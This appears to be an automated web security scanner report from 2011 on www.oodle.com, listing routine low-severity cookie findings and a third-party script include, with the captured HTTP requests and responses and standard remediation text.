HTTP/1.1 302 Moved Temporarily Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Location: http://www.oodle.com/browse/ Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:31 GMT Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEzMTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToyOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6InF1ZXJ5Ijt9aToxO2E6Njp7czozOiJsb2MiO3M6MTM6InVzYTp0eDpkYWxsYXMiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE4IjtzOjk6ImNpdHlfY29kZSI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJvcmlnaW4iO3M6NToiY2FjaGUiO319; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event/track-named/?event_name=gallery&page=home&partner=www&masquerade=www&country=USA®ion=18&event_type=page_start HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive Referer: http://www.oodle.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: otu=0f42222728a8a86771c623c32f72374b; ots=cde4a4a0acfe95d534c76e84d305aa1d; a=dT1FN0M3MTdCMDREODRCM0I1; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM4OTt9; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: no-cache, no-store P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Expires: -1 Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:47:27 GMT Connection: close Vary: Accept-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQ0Nzt9; path=/; domain=.oodle.com Content-Length: 7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/about/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:55 GMT Content-Length: 20868 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA5NTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/help/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:18 GMT Content-Length: 23460 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDExODt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/partner/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:29 GMT Content-Length: 21966 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyOTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/privacy/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:28 GMT Content-Length: 26885 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyODt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/safety/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:49 GMT Content-Length: 21511 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA4OTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/terms/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:15:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDEyNDt9; path=/; domain=.oodle.com Content-Length: 38167
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /message/no-script-warning/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:23 GMT Content-Length: 23391 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA2Mzt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pro/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:27 GMT Content-Length: 16929 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA2Nzt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pro/register/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 301 Moved Permanently Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Location: https://secure.oodle.com/pro/register/?partner=www®ion=usa&o_ip_address=tRfj_96RCewLtO6cJOZW7LP8iR6yS1by Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:27 GMT Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA2Nzt9; path=/; domain=.oodle.com Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regions/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D8985059512779%3A; otu=0f42222728a8a86771c623c32f72374b; __utmz=172606844.1300542410.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); a=dT1FN0M3MTdCMDREODRCM0I1; 90184176_clogin=l=1300542410&v=1&e=1300546011396; CoreID6=30970143228013005424100; loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjQxMjt9; cmTPSet=Y; ots=cde4a4a0acfe95d534c76e84d305aa1d; __utma=172606844.1886212322.1300542410.1300542410.1300542410.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.1.10.1300542410; __qca=P0-1438089575-1300542410173;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 14:14:45 GMT Content-Length: 22256 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0NDA4NTt9; path=/; domain=.oodle.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The response dynamically includes the following script from another domain:
http://maps.google.com/maps/api/js?sensor=false
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET / HTTP/1.1 Host: www.oodle.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 19 Mar 2011 13:46:31 GMT Connection: close Vary: Accept-Encoding Set-Cookie: otu=3d12132d80c3c544a5609c16de5eb5e0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=5c0593f4a30245fa5b12e2d4ff9a60c3; path=/; domain=.oodle.com Set-Cookie: a=dT1CNDk1N0FDODREODRCM0I3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czozOiJ3d3ciO3M6MTA6Il90aW1lc3RhbXAiO2k6MTMwMDU0MjM5MTt9; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7czoxMzoidXNhOnR4OmRhbGxhcyI7czo2OiJyYWRpdXMiO2k6NTA7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MjoiMTgiO3M6OToiY2l0eV9jb2RlIjtzOjEzOiJ1c2E6dHg6ZGFsbGFzIjtzOjY6Im9yaWdpbiI7czo1OiJjYWNoZSI7fX0%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 55586
